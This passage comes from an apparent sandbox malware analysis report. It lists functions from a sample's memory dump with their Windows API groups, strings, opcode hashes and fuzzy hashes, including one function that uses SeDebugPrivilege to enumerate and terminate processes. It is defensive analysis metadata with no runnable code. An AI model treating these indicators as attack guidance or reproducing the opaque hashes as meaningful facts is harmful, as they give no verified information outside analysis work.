                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Window$CreateObjectStockwcscat
                                                                                          • String ID: -----$SysListView32
                                                                                          • API String ID: 2361508679-3975388722
                                                                                          • Opcode ID: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                          • Instruction ID: 75ffd441e5f87c02c1f01cb659235420d02c76f208b2bff1eeeb3417c5bbc087
                                                                                          • Opcode Fuzzy Hash: c344d9879c390065c59b29320dac7b0039891542bbecba4ba3e0f02e7f9bfa97
                                                                                          • Instruction Fuzzy Hash: 50519232A08791CAE720EF25E8486DD73A1FB88784F80413AEE9D47B65DF39D555CB40
                                                                                          Function 00007FF74D09E2CC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 54windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameParentSend_invalid_parameter_noinfo
                                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                          • API String ID: 2019164449-3381328864
                                                                                          • Opcode ID: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                          • Instruction ID: 9526b4bd8f23c914827737ea2d51d2d0f1b3505af0f1089dc011d693c9428407
                                                                                          • Opcode Fuzzy Hash: 85bc50b5cb3f1aae72e6251db0d1ce00868677b2ce09b4091907517111ac15a9
                                                                                          • Instruction Fuzzy Hash: DF214F21F1D547C0FA60FB11E95927AA362AF86784F918035CD8E476B6FE2CE5168B20
                                                                                          Function 00007FF74D0C7054 Relevance: 13.9, APIs: 9, Instructions: 373COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString$FileFromLibraryModuleNamePathQueryType
                                                                                          • String ID:
                                                                                          • API String ID: 1903627254-0
                                                                                          • Opcode ID: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                          • Instruction ID: ab4ca5337d069e72379d4cdd4105f4b57ad18415a86722afd82a0f4ede9dd82a
                                                                                          • Opcode Fuzzy Hash: 598b5a242d4ad7e8ea74ab1cb47f7436f773884321b066f1e5bf024af7697886
                                                                                          • Instruction Fuzzy Hash: A0022A62A0CA86C6DB54EF29D4442ADA760FBC5F94F905032EA8E07B74EF7CD549C710
                                                                                          Function 00007FF74D0DC324 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                          • String ID:
                                                                                          • API String ID: 3210457359-0
                                                                                          • Opcode ID: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                          • Instruction ID: 8ee980c7f418702f386b353e6a9c27ac73a5885548a5a68a2abc16f28ca604ea
                                                                                          • Opcode Fuzzy Hash: 33ab6cce80c9e0840b45516de4cf550524ae496078474d2d7534a7033dd0db45
                                                                                          • Instruction Fuzzy Hash: 9861E521A0C643C6FB34FE2594647B99221BF88794F904132DAAE036F5EE7DE4809324
                                                                                          Function 00007FF74D09D780 Relevance: 13.6, APIs: 9, Instructions: 54memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 1957940570-0
                                                                                          • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                          • Instruction ID: fff21090d21e7449f5d55fecf016eabad28165f7438a3c3bec542c1b96cff9d9
                                                                                          • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                          • Instruction Fuzzy Hash: 1621287291DB85C2EB10AF52E44C36AB7A0F789FDAF844529DA8D07B64DF7CD1488B10
                                                                                          Function 00007FF74D0E0B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                          • API String ID: 3721556410-2107944366
                                                                                          • Opcode ID: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                                          • Instruction ID: 8776cf7536f0c51349e787b59fa1f73cfcb25e5241b662046ed7669edf9bac48
                                                                                          • Opcode Fuzzy Hash: 587eb60e7772e36f3e392801f2e4a607ca3d480d8a76847679925989c46b6468
                                                                                          • Instruction Fuzzy Hash: 6761AD32B1CA56CAEB00FB61E8845EDB770FB48B98F910132ED5D13AA5EE39E445C750
                                                                                          Function 00007FF74D0CE580 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                          • String ID: SeDebugPrivilege
                                                                                          • API String ID: 2533919879-2896544425
                                                                                          • Opcode ID: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                          • Instruction ID: d0721f65a13fe7215dc085a24ca186556ecebe27d9dc3fdeafaff8ff370e65b1
                                                                                          • Opcode Fuzzy Hash: 4f21c35d0a4ac780837a5a8e5dc6f68c18b89875e417af61e1445dd9dd8e1fe8
                                                                                          • Instruction Fuzzy Hash: 6A518F62A0C682C2EB04FB65C59437CAB60FF84B81F858835D68D077B2EF7CE4048720
                                                                                          Function 00007FF74D0AA070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                          • String ID: 2$P
                                                                                          • API String ID: 93392585-1110268094
                                                                                          • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                          • Instruction ID: 5e2c4fe5d237c730ce82d1fc08c9cfc5fa16e3a88b100f70571b3f4cde4318e7
                                                                                          • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
                                                                                          • Instruction Fuzzy Hash: 6151C132E0C642C9F760BF65E4442BDB7A1BB64758FA44136CA9A137E4EF39E4918730
                                                                                          Function 00007FF74D0DE248 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$LongMessageSend$Show
                                                                                          • String ID: '
                                                                                          • API String ID: 257662517-1997036262
                                                                                          • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                          • Instruction ID: fc62362a34a425d32110fcf35a5c018adbcef0aa2146033d156d6b10fb53728f
                                                                                          • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
                                                                                          • Instruction Fuzzy Hash: 9351D732A0C646C1E364FB66A46C6BDA751FB85B90F944533DEEE037A0EE3DE4418710
                                                                                          Function 00007FF74D0AAD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconLoad_invalid_parameter_noinfo
                                                                                          • String ID: blank$info$question$stop$warning
                                                                                          • API String ID: 4060274358-404129466
                                                                                          • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                          • Instruction ID: e7e615bfd744db8b7ce5bb7fc9488123a9d4f21130a775b9a45bf3f53be8dade
                                                                                          • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
                                                                                          • Instruction Fuzzy Hash: 6E215925A0C783C1EA64FB16A9011BAE369AF98780FD55031DD8E077A5FE7CE8018720
                                                                                          Function 00007FF74D0AC5C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                          • API String ID: 4051287042-3128320259
                                                                                          • Opcode ID: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                          • Instruction ID: 1ac4914101872016f52dac01f4b09c4dcf362407a7c0ebb95ed999c4987fde92
                                                                                          • Opcode Fuzzy Hash: f7e86a73b67135bbf4198df281c36ffde702979d794fcff8f2d08bb660d9317c
                                                                                          • Instruction Fuzzy Hash: 7F11707561CA89D1D724BB20F4487EAA360FB9C744FC0443ADA8E43B68EE7CC145C720
                                                                                          Function 00007FF74D0E233C Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                          • String ID:
                                                                                          • API String ID: 1211466189-0
                                                                                          • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                          • Instruction ID: df055ae1a037e0d87c2ff2c06a279ef5798ffc62e7bfca7f4494ff0c11947162
                                                                                          • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
                                                                                          • Instruction Fuzzy Hash: 6DA1066271C687C2EB68BF359154779B7A0FB88B44F505139DE8A43AA0EF3CE8518750
                                                                                          Function 00007FF74D0CFCC0 Relevance: 12.2, APIs: 8, Instructions: 246registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Close$BuffCharConnectDeleteOpenRegistryUpperValue
                                                                                          • String ID:
                                                                                          • API String ID: 50796853-0
                                                                                          • Opcode ID: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                          • Instruction ID: ba14311f7abfc9489152f12ed9759286579ec52825a44dcd38e6b6aa3665f30f
                                                                                          • Opcode Fuzzy Hash: f5a1a67ecd9b101a11fc5f9cb9367f83b4f1b47b2c9f0c1f4c44b8d49d3bc558
                                                                                          • Instruction Fuzzy Hash: 76B16022B0DA42C6EB10FF65D5943BCAB60EF45B84F804432DA8E57AA6EF78D105C764
                                                                                          Function 00007FF74D05443C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1268545403-0
                                                                                          • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                          • Instruction ID: 0ddeaa1579851f0871c191afd94adfb3cda919e6b5e37eaa2e6917fec9e1a57c
                                                                                          • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
                                                                                          • Instruction Fuzzy Hash: 3651D731E4C182C9FB64FB2494683BDA6969F86B08F994071DDCE036F5EE6CE484C661
                                                                                          Function 00007FF74D0D90A8 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3864802216-0
                                                                                          • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                          • Instruction ID: d86fe89fbaf2d3dd5578fe20564e9e51da2e32cf74c93a9639a4ad1d2bd6be00
                                                                                          • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
                                                                                          • Instruction Fuzzy Hash: 92418C7661C681C7E724AF21B458B6ABBA0F789B91F504135EFDA47B64EF3CD4408B00
                                                                                          Function 00007FF74D070BBC Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                          • Instruction ID: bfe4646e8f5748316e0660580e26545a6da5ba4b46a91e7a249d10152e535499
                                                                                          • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
                                                                                          • Instruction Fuzzy Hash: 4BC1E622B0C782C5EA60BF95941427DEB61AF54B80FD55235EACE0B7F5EE3CE8418721
                                                                                          Function 00007FF74D0B09C4 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                          • String ID:
                                                                                          • API String ID: 2550207440-0
                                                                                          • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                          • Instruction ID: 6a729460a84ce483f121516e791099017299c9e3b1ace2682a7833fc464c07f0
                                                                                          • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
                                                                                          • Instruction Fuzzy Hash: DBA19C22B0C616C5FB50FBA5C4943BCA760EB45B84F954431DE8D972A6EFBCE441C360
                                                                                          Function 00007FF74D032100 Relevance: 10.7, APIs: 7, Instructions: 246COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
